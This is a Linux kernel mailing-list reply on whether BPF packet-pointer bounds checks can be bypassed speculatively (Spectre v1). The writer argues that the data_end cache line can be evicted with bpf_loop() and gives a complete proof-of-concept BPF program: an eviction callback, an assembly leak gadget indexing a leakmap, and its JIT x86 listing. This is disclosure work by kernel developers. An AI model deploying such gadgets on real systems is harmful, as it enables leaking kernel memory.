On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
You mean since skb_shared_info is placed after skb->end, and in the zero-copy case destructor_arg may be initialized with the same kernel pointer for multiple skbs? The attacker cannot construct the address from data_end. The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END. But the attacker can do skb->data + X. The idea is that they can train the branch to mispredict with a large packet and then send a small one, so that the shared_info after skb->end has the same uarg pointer in all packets? So every skb->data + X is a different location, but all of them point to data that has uarg == destructor_arg?
That would be feasible in theory, but in order to speculate the loads, the branch mispredict has to be reliable. The spec v1 attack requires that one of the two loads feeding into the compare operation be slow. In this case both the data and data_end loads are going to be fast. The attacker cannot evict skb->data or skb->data_end from the cache.
It is true that this is not easily possible using the method most exploits use, at least to my knowledge (i.e., accessing the same address from another core). However, it is still possible to evict the cacheline with skb->data/data_end from the cache in between the loads by iterating over a large map using bpf_loop(). Then the load of skb->data_end would be slow while skb->data is readily available in a callee-saved register.
For a CPU with 64KiB of per-core L1 cache, all 64-byte cachelines can be evicted by iterating over a 64KiB array in 64-byte increments; that's only 1k iterations. Meanwhile, skb->data can be kept safe in r15, as this register is not used by bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might be possible, as bpf_loop() currently has an iteration limit of 8 million. To extend that, userspace could work on evicting the L3 cache from other cores and make the speculation window even larger. This would of course slow the whole reading process down, but in return you can also leak more data by indexing into the leak-array using a full byte.
For reference, here's the full program and assembly it is jited to:
/*
 * Per-iteration callback handed to bpf_loop() by pkt_ptr().
 *
 * Looks up element (index * 8) of evictmap and, if the lookup succeeds,
 * doubles the stored value in place, i.e. performs one load and one store
 * on that element.
 *
 * @index: iteration counter supplied by the caller.
 * @ctx:   callback context pointer; not used here.
 *
 * Returns 0 when the element was found and updated, 1 when the lookup
 * returned NULL.
 * NOTE(review): presumably the 8-element stride is meant to touch one
 * 64-byte cache line per iteration (8-byte values) -- confirm against the
 * evictmap definition, which is not shown here.
 */
static long callback_fn(__u32 index, void *ctx)
{
	/* Scale the iteration counter to the element index to touch. */
	__u32 key = index * 8;
	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
	if (value) {
		/* Read-modify-write so the element is both loaded and stored. */
		*value = 2 * *value;
		return 0;
	}
	/* Lookup failed: report non-zero to the caller. */
	return 1;
}
/*
 * Proof-of-concept tcx/ingress program written entirely in BPF assembly.
 *
 * Register usage, as established by the instructions below:
 *   r6 - return value, initialised to 0 and overwritten only if the
 *        leakmap lookup succeeds
 *   r7 - copy of the pointer passed in r1 on entry (the base for the
 *        +76 / +80 loads)
 *   r8 - 32-bit value loaded from r1 + 76 ("data")
 *   r9 - r8 + 34, the bound compared against "data_end"
 *
 * Sequence:
 *   1. prepare_data: load data and compute data + 34 into r9.
 *   2. evict_loop:   call bpf_loop() with 1024 iterations, callback_fn as
 *                    the callback, a pointer to a zeroed 8-byte stack slot
 *                    at r10 - 8 as the third argument and 0 as the fourth.
 *   3. gadget:       reload data_end from r7 + 80; if data_end <= r9 go to
 *                    exit. Otherwise load one byte from r7 + 14, store it
 *                    at r10 - 8 and use that slot as the key for a lookup
 *                    in leakmap; on a non-NULL result load the first
 *                    8 bytes of the element into r6.
 *   4. exit:         return r6.
 *
 * NOTE(review): the JIT listing accompanying this program loads 0x2000
 * (8192) as the first bpf_loop() argument, whereas this source uses 1024
 * -- confirm which iteration count the listing was generated from.
 * NOTE(review): the byte used as the leakmap key is read through r7 (the
 * saved entry pointer), not through the packet pointer held in r8/r9 --
 * confirm this is the intended access.
 */
SEC("tcx/ingress")
__naked void pkt_ptr(void)
{
	// +76: data
	// +80: data_end
	asm volatile ("	\
	r6 = 0; \
	r7 = r1; \
prepare_data_%=: \
	r8 = *(u32 *)(r1 + 76); \
	r9 = r8; \
	r9 += 34; \
evict_loop_%=: \
	w1 = 1024; \
	r2 = %[callback_fn] ll; \
	r3 = 0; \
	*(u64 *)(r10 - 8) = r3; \
	r3 = r10; \
	r3 += -8; \
	r4 = 0; \
	call %[bpf_loop]; \
gadget_%=: \
	r2 = *(u32 *)(r7 + 80); \
	if r2 <= r9 goto exit_%=; \
	r5 = *(u8 *)(r7 + 14); \
	*(u64*)(r10 - 8) = r5; \
	r2 = r10; \
	r2 += -8; \
	r1 = %[leakmap] ll; \
	call %[bpf_map_lookup_elem]; \
	if r0 == 0 goto exit_%=; \
	r6 = *(u64 *)(r0 + 0); \
exit_%=: r0 = r6; \
	exit; \
"	:
	: __imm_addr(leakmap),
	  __imm_addr(callback_fn),
	  __imm(bpf_loop),
	  __imm(bpf_map_lookup_elem)
	: __clobber_all);
}
bpf_prog_64fe264baec539aa_pkt_ptr: ; asm volatile (" \ 0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: sub $0x20,%rsp 1a: push %rbx 1b: push %r13 1d: push %r14 1f: push %r15 21: xor %ebx,%ebx 23: mov %rdi,%r13 26: mov 0xc8(%rdi),%r14 2d: mov %r14,%r15 30: add $0x22,%r15 // data prepared 34: mov $0x2000,%edi 39: movabs $0xffffffffc01d09b0,%rsi 43: xor %edx,%edx 45: mov %rdx,-0x8(%rbp) 49: lfence 4c: mov %rbp,%rdx 4f: add $0xfffffffffffffff8,%rdx 53: xor %ecx,%ecx 55: cmp $0x800000,%rdi 5c: jbe 0x0000000000000065 5e: mov $0xfffffff9,%eax 63: jmp 0x00000000000000a2 65: mov %rbx,-0x20(%rbp) 69: mov %r13,-0x18(%rbp) 6d: mov %r14,-0x10(%rbp) 71: mov %rdi,%rbx 74: xor %r13d,%r13d 77: mov %rdx,%r14 7a: cmp %rbx,%r13 7d: jae 0x0000000000000093 7f: mov %r13,%rdi 82: mov %r14,%rsi 85: callq 0x0000000000000148 8a: add $0x1,%r13 8e: test %rax,%rax 91: je 0x000000000000007a 93: mov %r13,%rax 96: mov -0x20(%rbp),%rbx 9a: mov -0x18(%rbp),%r13 9e: mov -0x10(%rbp),%r14 a2: mov 0x50(%r13),%rsi // load data_end a6: cmp %r15,%rsi // use of data_end and data a9: jbe 0x00000000000000f7 // to mispredict ab: movzwq 0x7c(%r13),%r8 // use of data b0: shr $0x10,%r8d b4: and $0xff,%r8d bb: mov %r8,-0x8(%rbp) bf: mov %rbp,%rsi c2: add $0xfffffffffffffff8,%rsi c6: movabs $0xffffb85680acd000,%rdi d0: add $0x210,%rdi d7: mov 0x0(%rsi),%eax da: cmp $0x20000,%rax e1: jae 0x00000000000000ec e3: shl $0x3,%rax e7: add %rdi,%rax ea: jmp 0x00000000000000ee ec: xor %eax,%eax ee: test %rax,%rax f1: je 0x00000000000000f7 f3: mov 0x0(%rax),%rbx f7: mov %rbx,%rax fa: pop %r15 fc: pop %r14 fe: pop %r13 100: pop %rbx 101: leaveq 102: retq
long callback_fn(__u32 index, void * ctx): bpf_prog_8e1ec5bf965fdd4a_callback_fn: ; __u32 key = index * 8; 0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: sub $0x8,%rsp 1a: shl $0x3,%edi ; __u32 key = index * 8; 1d: mov %edi,-0x4(%rbp) 20: lfence 23: mov %rbp,%rsi ; 26: add $0xfffffffffffffffc,%rsi ; __u64 *value = bpf_map_lookup_elem(&evictmap, &key); 2a: movabs $0xffffb85680a01000,%rdi 34: add $0x210,%rdi 3b: mov 0x0(%rsi),%eax 3e: cmp $0x1000,%rax 45: jae 0x0000000000000050 47: shl $0x3,%rax 4b: add %rdi,%rax 4e: jmp 0x0000000000000052 50: xor %eax,%eax 52: mov $0x1,%edi ; if (value) { 57: test %rax,%rax 5a: je 0x0000000000000069 ; *value = 2 * *value; 5c: mov 0x0(%rax),%rdi ; *value = 2 * *value; 60: shl %rdi ; *value = 2 * *value; 63: mov %rdi,0x0(%rax) 67: xor %edi,%edi ; } 69: mov %rdi,%rax 6c: leaveq 6d: retq
Remember that we rearranged the 'max_entries' field in struct bpf_map specifically to be in a different cache line than the fields controlled by user space. It was a necessary part of the spec v1 attack.